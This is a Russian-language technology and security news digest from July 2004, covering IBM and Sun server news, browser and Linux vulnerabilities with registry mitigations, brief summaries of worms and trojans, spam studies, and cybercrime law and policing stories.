13 июля IBM планирует анонсировать новое поколение Unix-серверов — источники утверждают, что это будет вторым этапом дебюта процессоров Power5. Ожидается, что Big Blue представит модели с двумя, четырьмя и 16 процессорами. Позднее IBM выпустит и наиболее мощную 64-процессорную систему, но это произойдет не ранее следующего квартала. IBM отказалась от комментариев для этой статьи. Вот уже длительное время Big Blue занимает третье место на рынке Unix-серверов, где идет ожесточенная конкурентная борьба, — уступая лидеру рынка Sun Microsystems и компании Hewlett-Packard. Но доля рынка IBM растет: в 2003 году, по данным Gartner, доходы IBM от продажи Unix-серверов выросли на 13% и составили $4,1 млрд, тогда как доходы Sun сократились на 16% до $5,4 млрд, а доходы НР — на 4% до $5,3 млрд. IBM объединяет два семейства серверов: модели pSeries, в которых используется версия Unix от IBM — AIX, и iSeries с операционной системой OS/400 и ее наследницей i5/OS. Оба семейства уже много лет постепенно сближаются, но с выпуском систем на базе Power5 их аппаратура стала полностью идентичной. Благодаря технологии, называемой сегментацией (partitioning), одна и та же система может исполнять AIX, i5/OS и Linux. Ожидается, что процессоры Power5 будут иметь тактовую частоту 1,5 ГГц, 1,65 ГГц и 1,9 ГГц. Они изготавливаются по 130-нм технологии, хотя будущая версия Power5+ должна производиться по 90-нм технологическому процессу.
ZDNet

5/07/2004 09:30 Хочешь получать больше спама - потребуй у спамера прекратить рассылку
Канадская компания Vircom исследовала, как влияют на объем спама, получаемого незащищенными пользователями, различные ответы на спамерские послания - от клика на ссылку в спамерском письме до агрессивного послания спамерам. В течение полугода Vircom, которая занимается разработкой систем безопасности электронной почты, проводила мониторинг тысяч почтовых ящиков. То, что позитивный ответ на спамерское письмо является верным способом "засветить" адрес и подвергнуться дальнейшим атакам спамеров - общеизвестно. Исследователей из Vircom поразил тот факт, что агрессивные отповеди спамерам приводят к аналогичному результату. После того, как пользователь отсылает спамеру требование прекратить рассылку, объем спама в его почтовом ящике возрастает на 300%! Vircom дает несколько простых рекомендаций, выполняя которые можно уйти из-под прицела спамеров: никогда не отвечать на спам; никогда не пытаться отказаться от спамерских рассылок; никогда не выходить на сайты по ссылкам в спамерских письмах (в этом случае существует еще и опасность получить дополнительные "подарки" - например, вирус);
использовать разные почтовые адреса для деловой переписки и получения рассылок, новостей и т.п.; давать свой почтовый адрес только надежным корреспондентам; никогда ничего не покупать у спамеров или их заказчиков; использовать антиспамовые фильтры.
Источник

4/07/2004 19:10 Из сингапурских студентов сделают хакеров
Новый предмет будут изучать в государственном Политехническом институте Сингапура. Курс необычен: 600 студентов в обязательном порядке пройдут курс хакерского мастерства. Преподаватель информатики и сетевых технологий вуза Сингапура Стивен Чью уверен, что для того, чтобы поймать вора, необходимо знать, как он работает. Поэтому первым практическим заданием для студентов будет взлом компьютерной сети самого колледжа. Причем нормативы устанавливаются довольно жесткие: всего за полчаса необходимо проникнуть в сеть, созданную на основе "железа" и программного обеспечения Cisco и IBM. Взламывать ее с помощью программного обеспечения от IBM будут на деньги самой IBM: обучение хакерству частично спонсируется американским компьютерным гигантом. Это являются частью курса, обучающего, как ставить помехи настоящим хакерам. В рамках новой программы студенты узнают, как работают компьютерные злоумышленники и как ловить в сетях непрошеных гостей. Преподаватели института почему-то уверены, что обучение не повредит ни студентам, ни сетям. По законам города-государства, за хакерство грозит тюремное заключение сроком до трех лет или штраф в размере до 10 тыс. сингапурских долларов. И никто не вспоминает, что иной взлом приносит гораздо больше 10 тысяч. Настолько больше, что и три года покажутся тремя неделями. Но делать нечего, приходится идти на риск. За последние годы Азия стала мировым центром хакерства. Один только вирус Love Bug, написанный на Филиппинах и взломавший системы электронных почтовых серверов во всем мире, принес убытки в десятки миллионов долларов, причем американских.
Utro.Ru

4/07/2004 18:14 Подробности об открытии кода Solaris
Стали известны некоторые подробности относительно планов компании Sun Microsystems по открытию кода операционной системы Solaris. В начале июня президент компании Джонатан Шварц сообщил, что Sun намеревается перевести Solaris на принципы open-source, но никаких подробностей об этом не сообщил. Однако некоторая новая информация об открытии кода Solaris все же просочилась в прессу. В частности, издание CRN со ссылкой на анонимных представителей Sun сообщает, что в планах компании открыть практически весь код операционной системы, а не отдельные его фрагменты. Сообществу open-source будут переданы все наработки Sun в области операционных систем. Соответствующий проект, скорее всего, получит название OpenSolaris.org (другие варианты наименования также рассматриваются) и будет управляться самой Sun. О каких-либо сроках реализации OpenSolaris.org пока ничего неизвестно.
nixp.ru

4/07/2004 17:59 Red Hat открывает код приобретенных технологий
Через пять месяцев после покупки за 31 млн. долл. фирмы Sistina Software компания Red Hat выпустила по лицензии открытого кода все разработанные ею программные продукты, в том числе кластерную файловую систему Global File System (GFS). Изначально разработанная в качестве ПО с открытым кодом в Университете Миннесоты, GFS стала закрытым продуктом в 2001 году, когда ее создатели образовали Sistina Software. Параллельно коммерческой развивалась открытая версия GFS, OpenGFS, и теперь Red Hat объединит эти два проекта. До сих пор Red Hat предлагала GFS по цене 2,2 тыс. долл. в расчете на сервер.
"Открытые системы"

4/07/2004 17:42 Уязвимости в Internet Explorer всё равно могут быть использованы!
После выхода рекомендаций от Microsoft в BugtraQ (и в full-disclosure) разгорелись дискуссии о существовании уязвимости, позволяющей использовать чуть модифицированный эксплоит, получивший название "the-insider". Дело в том, что помимо уязвимости в компоненте ActiveX ADODB.Stream, существует ещё уязвимость в компоненте Shell.Application, о чём сообщил известный исследователь http-eqiuv и подтвердил Лю Ди Ю (не менее известный исследователь уязвимостей в IE). Также следует отметить, что тут же Drew Copley из eEye сообщил способ, помогающий закрыть и эту уязвимость. По-прежнему необходимо подправить ключ рееестра [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{13709620-C279-11CE-A49E-444553540000}], исправив "Compatibility Flags"=dword:00000400. Подчёркивается, что как и прошлая уязвимость, так и нынешняя известна исследователям около 10 месяцев и по-прежнему не закрыта Microsoft. eEye выпущена небольшая утилита, выложенная на их сайте, помогающая устранить уязвимость. Что касается Shell.Application, то она (или оно?) используется системными администраторами для администрирования системы на основе скиптов на Visual Basic или WSH. Фактически представляет собой замену от M$ шелл-скриптов в *NIX.
Фикс от eEye
Анализ эксплоита IE
Ещё один анализ

4/07/2004 16:50 И ещё раз к вопросу о закрытии уязвимости Internet Explorer
В дополнение к рекомендации Microsoft в списке рассылки BugtraQ, Mike Cheng рекомендует также выставить ограничения в зоне безопасности "Local Computer". Однако, по умолчанию эта зона скрыта в IE. Для её открытия необходимо внести изменения в ключ реестра: [HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] -> "Flags"= dword:00000001. После чего зайти в IE "Tools" -> "Internet Options" -> "Security" и выставить на значке "My Computer" уровень безопасности "Custom" в High. Выставка подобного уровня может привести к неработоспособности некоторых программ при их разработке на локальной машине. В этом случае рекомендуется выставить уровень (если не происходит работы с IE) в средний или низкий.
SecurityFocus

4/07/2004 16:37 Оборонный закон может задушить компьютерный бизнес
Последний вариант законопроекта о военных расходах США, вызвавший возобновление дебатов по поводу ограничения экспорта высокопроизводительных компьютеров, требует от компаний оформления лицензий даже на экспорт настольных ПК. Закон США об ассигнованиях на государственную оборону (National Defense Authorization Act), который уже утвержден Палатой представителей, предусматривает существенное ужесточение экспортных правил. Эти правила составляют лишь мизерную часть 630-страничного документа, но могут иметь катастрофические последствия для компьютерной индустрии. «Для экспорта это будет означать экстренное торможение, — говорит Дэн Хойдиш, директор Unisys по торговле и связям с общественностью и госструктурами, а также председатель широко представленной организации «Коалиция компьютерной индустрии за ответственную экспортную политику» (Computer Coalition for Responsible Exports). — В этом случае нам придется оформлять не двадцать экспортных лицензий в год, а двадцать тысяч в день». Сегодня продавцы компьютеров должны получать лицензии на экспорт любого компьютера, производительность которого эквивалентна или превышает производительность системы с 32 процессорами Intel Itanium. Закон об ассигнованиях на национальную оборону в его теперешнем виде опускает этот лимит до систем, которые Министерство обороны относит к «ключевым военным технологиям». Сейчас к таковым относится компьютер с процессором Pentium III 650 МГц, который соответствует уровню вычислительной техники 1999 года. Более того, предлагаемые правила должны применяться к экспорту в любую страну, включая союзников США. В версии закона, одобренной Сенатом на прошлой неделе, спорный раздел, т. н. Статья 1404, отсутствовал. Это означает, что судьба предлагаемых правил будет решена путем переговоров между Палатой представителей и Сенатом, которые запланированы на конец июля.
ZDNet

4/07/2004 16:14 Уголовная ответственность за перехват и копирование компьютерной информации
Верховная Рада Украины намерена ввести уголовную ответственность за перехват и копирование компьютерной информации или носителей такой информации. За принятие в первом чтении предложенного Кабинетом Министров проекта закона о внесении изменений в Уголовный и Уголовно-процессуальный кодекс проголосовали 247 депутатов при необходимых 226. Кроме этого, Рада намерена ввести уголовную ответственность за создание с целью сбыта программных или технических средств, предназначенных для незаконного проникновения в компьютеры, системы или сети. Рада также намерена ввести уголовную ответственность за незаконное тиражирование с целью сбыта электронных баз данных, которые содержат персональные данные. В соответствии с действующим законодательством, предусмотрена уголовная ответственность за искажение или уничтожение компьютерной информации или носителей такой информации. В частности, за такие преступления предусмотрены штраф от 1 190 до 6 800 гривен, исправительные работы на срок до 2 лет, ограничение свободы на срок до 5 лет или лишение свободы на срок от 3 до 5 лет.
Crime-Research

4/07/2004 15:47 Онлайновый сервис по взлому MD5-хэшей
Открылся новый онлайновый сервис, предлагающий бесплатные услуги по взлому MD5-хэшей. На настоящий момент подбор паролей ограничен только прописными буквами (a-z) и цифрами, а также длиной в 8 символов. Проект использует технологию RainbowCrack, основанную на технологии, разработанной Philippe Oechslin. Для взлома используются 80 таблиц, каждая объёмом в 610 МБ. Таким образом суммарный размер таблиц превосходит 40 ГБ. Среднее время проверки одного хэша составляет около 40 минут.
Сайт проекта

4/07/2004 10:34 Рекомендации Microsoft по закрытию уязвимости
Microsoft наконец-то выпущены рекомендации, позволяющие закрыть узвимость, которая недавно активно использовалась в нашумевшей атаке с использованием российского сервера. Как следует из описания, уязвимость была связана с некорректной обработкой объекта ADODB.Stream, позволяющей загрузить и выполнить произвольный файл в зоне безопасности Local Machine. Предлагается в реестре отключить флаг совместимости ActiveX c объектом ADODB.Stream.
Рекомендации M$

3/07/2004 15:52 В Китае будут фильтровать SMS-сообщения
Китайские власти наделили операторов мобильной связи правом фильтрации SMS-трафика с целью извлечения из общего потока сообщений мошеннического и порнографического характера. Несмотря на благую, в принципе, цель, заявленную китайскими властями, независимые наблюдатели опасаются, что установка систем автоматической перлюстрации SMS-трафика может быть использована и для слежения за политически неблагонадежными гражданами страны. В последнее время, как известно, в Китае предпринимаются все более жесткие меры ограничения диссидентской активности. В частности, как сообщает BBC News со ссылкой на организацию 'Репортеры без границ', китайская компания Venus Info Tech Ltd, разрабатывающая системы фильтрации текстовых сообщений, объявила на днях, что начинает отслеживать сообщения, содержащие в себе 'лживые политические слухи', а также 'реакционные реплики'. Фильтрация осуществляется с помощью стандартных алгоритмов, выделяющих подозрительные сообщения по ключевым словам и их комбинациям.
Internet.Ru

3/07/2004 12:47 «Компания 2КОМ» (Москва) защищает почту
ООО «Компания 2КОМ» (Москва) объявило о том, что абонентам, пользующимся почтовыми ящиками com2com.ru, предоставляется новая услуга — защита почты от писем с вирусами. После подключения этой услуги все приходящие на адрес электронной почты клиента сообщения будут проверяться на почтовом сервере «Компании 2КОМ» при помощи антивирусной программы Dr.Web. Если будет получено зараженное письмо, клиента предупредят о том, что оно было получено и не было доставлено. При необходимости инфицированные письма можно будет получить, пользуясь указаниями, данными в предупреждении.
Доступ к услуге

3/07/2004 12:32 В HP-UX и Mandrake Linux обнаружены серьезные уязвимости
Датская компания, занимающаяся изучением вопросов компьютерной безопасности, Secunia опубликовала предупреждение о новых уязвимостях, классифицированных как «крайне важные», в операционных системах Linux Mandrake 9.1, HP-UX. Некоторые из них были обнаружены в коде браузера Netscape для HP-UX. Используя эти уязвимости, хакер может получить удалённый доступ к информации и данным системы, а также возможность запустить любой код или атаковать систему, приведя её к отказу от обслуживания (DoS-атаки). HP уже отреагировала, выпустив обновление для последней версии браузера Mozilla, использующий тот же движок Gecko, что и Netscape. Обновление можно получить здесь. Mandrake также выпустил патчи, исправляющие ошибку переполнения буфера в 32- и 64-битных версий систем Mandrake 9.1 и Corporate Server 2.1. Обновления устраняют проблему в модуле mod_proxy веб-сервера Apache, о которой сообщалось ранее. Пользователям Mandrake необходимо остановить Apache и запустить автоматическое обновление как можно быстрее.
CNews

3/07/2004 12:11 Червь Doep досаждает пользователя файлообменных сетей
Специалисты компании Symantec зафиксировали появление нового червя Doep, заражающего компьютеры под управлением операционных систем Windows. После запуска пользователем вирус создает в системной директории файлы с именами poet.log, readme.txt, poet.exe и модифицирует реестр, обеспечивая себе автоматический запуск. Далее в папку %Windir%\System32\Inf (где %Windir%\ - директория Windows) записываются многочисленные копии вредоносного кода под видом различных утилит, игр или крэков, например, Half-Life 2 или Pamela Anderson Multimedia Screen Saver. Затем директория %Windir%\System32\Inf прописывается в качестве общедоступной папки файлообменных сетей Kazaa, eMule, eDonkey2000, Lphant и Overnet. На сегодняшний день червь Doep еще не получил широкого распространения.
Compulenta.Ru

3/07/2004 11:49 Novell выпустила кроссплатформенный инструментарий Mono
В среду Novell выпустила пакет ПО open source для программистов, желающих при помощи инструментов разработки Microsoft создавать приложения для альтернативных Windows операционных систем, включая Linux. По словам основателя Mono Project, ныне вице-президента Novell по разработке Мигеля де Икаса, проект предназначен для достижения той простоты работы, которая характерна для инструментов Microsoft .Net, при создании ПО для альтернативных операционных систем. Novell приобрела шефство над Mono в прошлом году, когда купила компанию-разработчика ПО open source Ximian. «Mono помогает разработчикам сосредоточиться на том, что они делают, а не на мелких деталях платформы, с которой работают», — пояснил де Икаса. В рамках выпуска Mono 1.0 Novell открыла веб-сайт с ресурсами и информацией для разработчиков Mono. Mono 1.0 включает компилятор для языка программирования Microsoft C# и другие инструменты на базе .Net для ускорения разработки приложений, включая ASP.Net для создания веб-приложений и ADO.Net для доступа к базам данных. Кроме того, моно включает версии .Net "runtimes" — программ, необходимых для исполнения .Net-приложений на компьютерах с Linux, Unix и Apple Computer OS X.
Сайт проекта

3/07/2004 11:33 Осторожно: шарлатаны в Интернете
Интернет-коммерция цветет пышным цветом. По данным консалтинговой компании "JupiterResearch", около 50% американцев покупали что-нибудь через Интернет в прошлом году. К сожалению, как минимум 10% подобных покупателей были обмануты. Вместо покупки настоящих, как они думали, товаров они приобрели подделки. Подделки всех видов и типов получают широкое распространение в сети. 21 июня ювелирная компания "Tiffany &Co." подала в суд на аукционный сайт "eBay", утверждая, что 73% ювелирных изделий "Tiffany", продающихся через сайт, являются подделками. 17 июня Главное бюджетно-контрольное управление США выпустило доклад, в котором сообщается, что 6%, или 4 из 68 лекарств, купленных следователями в американских и зарубежных онлайн-аптеках, были подделками. "Объемы подделок, и соответственно, вызываемые ими серьезные последствия растут", - говорит руководитель онлайн-аптеки "Drugstore.com" Питер Ньюперт (Peter Neupert). Отчасти он винит в этом увеличение стоимости услуг в сфере здравоохранения, выражающееся в двузначных цифрах ежегодно, что побуждает пациентов искать более дешевые лекарства.
crime-research.ru

3/07/2004 10:31 Бесплатный Linux для покупателей MaxSelect
Компании MaxSelect Technology и ALT Linux объявили о начале поставок со всеми моделями ноутбуков MaxSelect предустановленной операционной системы ALT Linux. Cпециальная версия ALT Linux Compact MaxSelect Edition учитывает и поддерживает практически все аппаратные возможности ноутбуков MaxSelect, покупатели которых получат полноценную операционную систему и набор пользовательских приложений. Цена ноутбука для потребителя при этом осталась прежней — предустановленная система, диск с дистрибутивом и руководство пользователя поставляются бесплатно.
Подробнее

2/07/2004 14:56 Обнаружена троянская программа Cabrotor
Компания F-secure обнаружила новую троянскую программу, получившую название Cabrotor, пишет "Компьюлента". После проникновения на компьютер вирус записывается в директорию Windows и модифицирует реестр, обеспечивая, тем самым, себе автоматический запуск при загрузке операционной системы. Далее троян соединяется с определенным IRC-сервером, ожидая команд от своего автора. При помощи Cabrotor злоумышленники могут воровать информацию об инфицированной машине, загружать файлы, осуществлять DoS-атаки на неугодные ресурсы и выключать Windows.
Описание

2/07/2004 14:33 Сетевой червь Magold меняет цвета активных окон
Компания "Лаборатория Касперского" обнаружила новую вредоносную программу Magold, распространяющуюся по электронной почте в виде вложений, через локальные и файлообменные сети, а также каналы IRC. После запуска присланного файла пользователем ПК вирус копирует себя в папку Windows под именами "raVe.exe" и "Maya Gold.scr" и регистрируется в ключе автозапуска системного реестра. Далее червь выводит на дисплей сообщение об ошибке, рассылает собственные копии по найденным на машине адресам, пытается проникнуть на доступные сетевые диски и в пиринговые сети. Кроме того, Magold способен менять цвета активных окон (см. скриншот), блокировать курсор мыши, не позволяя ему добраться до верха экрана, и отправлять на печать текст с жалобами на низкое качество реализации поддержки принтеров в Microsoft Windows.
О вирусе

2/07/2004 13:49 Выход Java 1.4.2_05
Sun Microsystems анонсирован выход тестовой версии Java 1.4.2_05, которая является фактически багофикс-версией предыдущей и предваряет готовящейся к выпуску версией Java 5.0.
Подробности

2/07/2004 13:32 Конкуренты IE ищут альтернативу ActiveX
Соперники Microsoft объединили усилия с целью создания нового способа исполнения прикладных программ в веб-браузере. На кон поставлено будущее «веб-плагинов», программ, создаваемых независимыми разработчиками, таких как анимационное ПО Flash от Macromedia, которые работают внутри браузеров. Конкуренты Microsoft хотят дополнить плагины таким образом, чтобы они не нуждались в технологии Microsoft ActiveX, встроенной в Internet Explorer. В среду три производителя браузеров — Mozilla Foundation, Opera Software и Apple Computer — объявили о том, что они соединили усилия с поставщиками плагинов Sun Microsystems, Adobe Systems и Macromedia, чтобы пересмотреть способ работы плагинов в не-Microsoft браузерах. ActiveX позволяет плагинам непосредственно взаимодействовать с содержимым веб-страницы. Это мощный инструмент, который приобрел дурную славу из-за регулярных проблем безопасности. Используя ActiveX, музыкальная веб-страница может проигрывать песни через плагин Microsoft Windows Media Player, а рекламный флэш-ролик — возвращать на веб-сайт заказы для оформления счетов. Мир альтернативных браузеров для исполнения плагинов издавна опирается на NPAPI (Netscape Plug-in Application Programming Interface). Mozilla Foundation — это организация open source, разрабатывающая код браузера на основе той базы, которая была у Netscape Communications до того, как ее приобрела America Online. В прошлом году AOL отделила от себя эту группу в качестве некоммерческой организации и возобновила связи с Microsoft.
Поодробности

2/07/2004 12:51 Вирусный хит-парад от Panda Software
Продолжая предыдущую новость - опубликован также отчёт о вирусной активности июня от Panda Software. В прошедшем месяце троянец Downloader.GK стал причиной наибольшего числа заражений компьютеров пользователей по всему миру, свергнув Netsky.P с вершины десятки. По данным, собранным бесплатным онлайновым сканером Panda Software, троянец Downloader.GK стал причиной большинства заражений компьютеров пользователей по всему миру в июне 2004. Возможности данного троянца позволили ему занять первое место в десятке наиболее активных вирусов и вытеснить с ее вершины Netsky.P, занимающего данное место в апреле и мае. В прошедшем месяце Downloader.GK стал причиной 12.75 процентов инцидентов. Вслед за ним идет Briss.A, фигурирующий в 11.87 процентах случаев заражения. Затем Netsky.P (8.34 процентов), Sasser.ftp (7.29 процентов) и Gaobot.gen (4.74 процентов). Во второй половине рейтинга присутствуют Qhost.gen, Netsky.D, Downloader.HC, Revop.F и StartPage.FH.
Panda Software

2/07/2004 12:22 Обзор вирусной активности за июнь 2004 г.
Опубликован обзор вирусной активности прошедшего месяца от "Лаборатории Касперского". Согласно этому обзору, на первом месте значится червь Zafi.b - 33.97%, остальные места прочно удерживаетт троян Netsky в различных реинкарнациях: аа - 18.44%, b - 16.76%, q - 5.38%. Июнь 2004 года оказался, пожалуй, самым спокойным месяцем этого года с точки зрения глобальных вирусных эпидемий. Трудно сказать, что сыграло здесь решающую роль - то ли вирусописатели, напуганные арестами авторов нескольких червей, то ли усилия антивирусных компаний по устранению последствий эпидемий прошлых месяцев. Однако налицо положительная тенденция - всего один новый червь в рейтинге. Впрочем, он же стал и лидером, что также легко обьяснимо русской поговоркой - "на безрыбье и рак рыба".
Отчёт

2/07/2004 11:59 Южная Корея расширяет антихакерские полицейские подразделения
Агентство национальной полиции Республики Корея в текущем году планирует сформировать подразделение по борьбе с кибертеррором, сообщает газета Korea Times. Решение во многом продиктовано недавними нападениями хакеров на сайты южнокорейских правительственных структур и распространением в Сети фрагментов видеозаписи казни корейского переводчика в Ираке. «Новое подразделение будет состоять из 110 человек. Руководить им будет высокопоставленный офицер полиции», - пояснили в правоохранительных органах. До недавнего времени расследованием всех преступлений, связанных с компьютерными преступлениями занималась небольшая группа офицеров. Новую структуру разделят на четыре основных отдела: по предотвращению кибертерроризма, разработке технологий для борьбы с хакерами; расследованию преступлений, совершенных в интернете; и международного сотрудничества. Противостояние с киберпреступниками в Республике Корея началось в 1995 году. Тогда в стране было создано первое подразделение для расследования преступлений хакеров. В августе 1997 года эта структура была преобразована в отряд по расследованию компьютерных правонарушений. Штат отдела был увеличен до 10 человек. По мере увеличения числа компьютерных преступлений увеличивалась и численность отдела. «Поскольку корейское правительство направляет войска в Ирак, компьютерные систем национальных организаций становятся уязвимыми для иракских боевиков и хакеров-пацифистов», - отмечают представители южнокорейских властей. По их словам, новое подразделение будет эффективно бороться с теми, кто пытается атаковать киберпространство. В июне хакерским атакам подверглись компьютерные системы шести крупных организаций, в числе которых оказался и Корейский институт оборонной аналитики. В марте прошлого года, почти сразу после начала войны в Ираке, группа бразильских хакеров атаковала 60 интернет-ресурсов Республики Корея.
Источник

2/07/2004 11:30 Половина спамеров шлет письма из США и держит сайты в Китае
Компания Commtouch, специализирующаяся на антиспамерских продуктах, выяснила главные источники спама, передает CNET News. Согласно аналитикам, 55 процентов спамерских писем рассылается из США, причем 73 процента из них отсылают получателей на сайты, размещенные у китайских хостинговых провайдеров. Кроме того, как выяснилось, 99 процентов сайтов, на которые посылают спамерские письма, расположены всего в пяти странах: в США, в Китае, в Южной Корее, в России и в Бразилии. Подавляющее большинство спамерских писем составлены на английском языке. Лишь 5.8 прочента написаны на других языках.
Lenta.ru

2/07/2004 10:25 Зюганов отбил атаку хакеров и "альтернативщиков"
Естественно, не сам, а при помощи какого-нибудь админа, но факт остаётся фактом. В четверг интернет-сайт КПРФ подвергся хакерской атаке. "В течение нескольких минут на сайте висела информация, запущенная неизвестными хакерами. Сейчас сайт восстановлен, вся информация на нем достоверная", - заявил РИА "Новости" сотрудник пресс-службы Компартии Анатолий Баранов. Ранее пресс-служба распространила сообщение, что начиная с 16:00 размещенная на сайте информация "не отражала официальную точку зрения партии" и была "призвана посеять разброд и шатание в рядах коммунистов и сторонников партии". Сайт КПРФ был атакован одновременно с появлением сообщений о проведении альтернативного пленума ЦК КПРФ, который проголосовал за отставку Геннадия Зюганова с поста лидера партии. На пленуме присутствовал и секретарь ЦК КПРФ Сергей Потапов.
РИА "Новости"

1/07/2004 19:26 Уязвимость в ядре Linux
Как сообщает студент Силезского университета технологий (Польша), обнаружена уязвимость в ядрах Linux ветки 2.6.х. Уязвимость присутствует в программе обработки TCP-опций входящих пакетов при разборе оных встроенным файрволлом IPTables, если правила, с которыми он составлен применяют опции --tcp-option. Уязвимост присутствует в функции tcp_find_option() программы net/ipv4/netfilter/ip_tables.c. и связана с некорректной обработкой поля длины пакета в поле TCP-опций. Если величина этого значения больше 127 может произойти ситуация входа программы в бесконечный цикл. Таким образом, сформировав TCP-пакет (пример которого приводится), можно вызвать исчерпание системных ресурсов сервера (рабочей станции) с последующим DoS-ом. Естественно, атака может быть проведена удалённо (хотя и требует нескольких условий). Фикс ядра выпущен.
BugtraQ

1/07/2004 19:07 Уязвимость в RSBAC
Обнаружена уязвимость в популярном ПО RSBAC, основное назначение которого - повышение безопасности открытых систем (распространяется на основе GPL-лицензии) с помощью применения механизмов MAC, ACL и RC. Уязвимость присутствует в механизме JAIL, основное назначение которого - запуск приложений пользователей (и системных процессов) в ограниченной среде. При использованиии системных вызовов sys_creat, sys_open и sys_mknod, пользователи могут создавать файлы с установленными битами SUID, SGID внутри JAIL-среды. Ввиду некорректности проверки в модуле CREATE полномочий создаваемых файлов, может возникнуть ситуация локального повышения привилегий пользователы внутри JAIL-среды. Выпущен багофикс 1.2.3-3, устраняющий уязвимость.
Обновления

1/07/2004 16:39 Продолжение противостояния "Антивирусные компании - HangUP Team"
После опубликования заявления HangUP Team по поводу отрицания командой причастности к прошедшей эпидемии стали появляться скриншоты тела трояна Padobot (версия W которого как раз и принимала участие в эпидемии), которые якобы как раз и содержали тот самый злополучный копирайт "Coded by HangUP Team". Как пищут сами ребята, в версии W трояна как раз этой самой строки и нет. Поскольку первой об этой строке заявила антивирусная компания F-Secure, члены команды как раз к ней и обращаются (вернее, к её представителю - нашему соотечественнику Алексею Подрезову) с тредованием предоставить скриншот с фразой из версии W. Собственно говоря, IMHO, никто не мешает стороннему разработчику, взявшему за основу исходники Padobot (а найти их не составит большого труда), вставить в тело трояна (даже не дизассемблируя в простейшем случае - вставить в исполнимый файл при помощи любого HEX-редактора) строку "Coded by Microsoft" (по вкусу - FSB, Laboratory of Kaspersky). Писали они сами этот троян или не писали - судить не берусь. Просто речь идёт о том, создавали они этот троян или не создавали - судить об этом на основе подобной строки - по крайней мере глупо.
Текст сообщени от HangUP"

1/07/2004 15:56 Уязвимости во многих браузерах
Ну и чтобы пользователи других браузеров не расслаблялись, всё та же Secunia сообщает об уязвимости на сей раз во многих браузерах типа "Frame Injection". Уязвимость связана с тем, что механизм безопасности браузеров не проверяет, является ли ссылка в целевом фрейме принадлежащей вызвавшему окно сайту. В результате возникает возможность загрузки с сайта злоумышленника произвольного содержимого в произвольный фрейм в другом окне браузера. Таким образом, сама уязвимость носит всё тот же характер спуффинга. Уязвимости подвержены: Opera 7.51 for Windows, Opera 7.50 for Linux, Mozilla 1.6 for Windows, Mozilla 1.6 for Linux, Mozilla Firebird 0.7 for Linux, Mozilla Firefox 0.8 for Windows, Netscape 7.1 for Windows, Internet Explorer for Mac 5.2.3, Safari 1.2.2, Konqueror 3.1-15redhat, а также IE (см. предыдущую новость). Уязвимости не подвержены: Mozilla Firefox 0.9 for Windows, Mozilla Firefox 0.9.1 for Windows, Mozilla 1.7 for Windows, Mozilla 1.7 for Linux. Secunia также создала тестовую страницу, руководствуясь которой можно проверить наличие уязвимости в браузере.
Описание

1/07/2004 15:16 Очередная уязвимость в Internet Explorer
Группа Secunia, работающая в области компьютерной безопасности, опубликовала предупреждение о новой уязвимости в системе безопасности популярного веб-браузера Internet Explorer. По информации из предупреждения Secunia, уязвимость, классифицированная как «средне серьёзная», присутствует в версиях 5.01, 5.5 и 6. IE не запрещает сайту злоумышленника подставлять «случайный контент» в случайный фрейм окна браузера. Согласно информации группы, вредоносный контент будет загружен, если он был создан доверяемым сайтом, что является атакой, шире известной как «спуфинг». Специалисты Secunia подтвердили наличие уязвимости в «Internet Explorer 6 ОС Microsoft Windows XP со всеми исправлениями», а также сообщили, что и другие версии браузера могут иметь данную проблему. Группа советует пользователем IE не посещать ненадёжные веб-сайты или выбрать другую программу-браузер. Корпорация Microsoft пока никак это не прокомментировала. Хотелось бы также отмеить, что небезызвестный исследователь http-equive ведёт на своём сайте список неустранённых уязвимостей в Internet Explorer и в начтоящий момент список содержит 14 уязвимостей.
Secunia

1/07/2004 14:44 Управлением «К» МВД России пресечена деятельность преступной группы
28 июня 2004 г. в Москве сотрудниками Управления «К» МВД России полностью пресечена деятельность крупной организованной преступной группы (ОПГ), которая в течение нескольких лет занималась изготовлением и сбытом специальных технических устройств, предназначенных для негласного получения информации с технических каналов электросвязи, включая компьютерную информацию, циркулирующую в системе ЭВМ. Доход от преступного бизнеса исчислялся сотнями тысяч долларов США. Преступники незаконно изготавливали и сбывали следующие специальные технические устройства:
1. Прибор «Муха», стоимостью 5000$ США. Внешне он ничем не отличается от обычного стационарного телефонного аппарата с расширенными функциями (АОН, автосекретарь, будильник, переадресация вызова, память входящих и исходящих звонков и др.) типа «Русь», «Ягуана» и «Panasonic». Данный прибор стандартно включается в обычную телефонную розетку и позволяет прослушивать телефонный разговор любых абонентов, ведущийся в любом городе. Для этого лишь надо ввести с клавиатуры телефонный номер того, чей разговор необходимо прослушать, или код соответствующего населенного пункта и телефонный номер, если прослушиваемый абонент находится в другом городе. Одновременно разговор может быть выведен через встроенный динамик (режим «громкоговорящая связь») либо записан на аудиокассету подключаемого через стандартный разъем бытового диктофона.
2. «Клавиатурный жучок». Предназначен для перехвата и записи текста, печатаемого с клавиатуры компьютера. Для этого необходимо скрытно прикрепить (приклеить) «жучок» к проводу клавиатуры «прослушиваемого» компьютера. С помощью «усов» - антенн, «жук» дистанционно передает «снятый с клавиатуры» электромагнитный сигнал на специальное радиоприемное устройство, подключенное к персональному компьютеру типа «ноутбук». Последние могут находиться на расстоянии до 1 км. от места установки «жука», например, в легковом автомобиле с тонированными стеклами. В данном случае радиоприемное устройство выполняет функцию радиомодема и дешифратора. Принятый и декодированный им полезный сигнал поступает в «ноутбук» и выводится на его экран, где в динамике синхронно воспроизводится тот текст, который потерпевший печатает в данный момент на клавиатуре своего компьютера. Изготовитель данного технического устройства – некто Михаил Ербенко – в настоящее время находится в федеральном розыске.
Руководил деятельностью разоблаченной ОПГ 30-летний москвич Николай Андреев. Как было установлено следствием, несколько лет назад он собрал под свое начало нескольких талантливых молодых программистов и радиотехников, которые и составили «костяк» данной преступной группы. Оперативникам удалось выйти на их след через одного из продавцов «телефона Муха». Работа по данному делу велась несколько последних лет. Совсем недавно руководитель ОПГ находился в федеральном розыске. Тем не менее, благодаря квалифицированным действиям оперативных сотрудников МВД России, он был задержан и в настоящее время находится в заключении. Его подельщики также обезврежены. По оперативным данным Управления «К» МВД России, после ликвидации ОПГ на «черном» рынке наблюдается дефицит шпионской техники указанного класса.
Crime-Reseacrh.Ru

1/07/2004 13:24 Стандартизация browser-плагинов
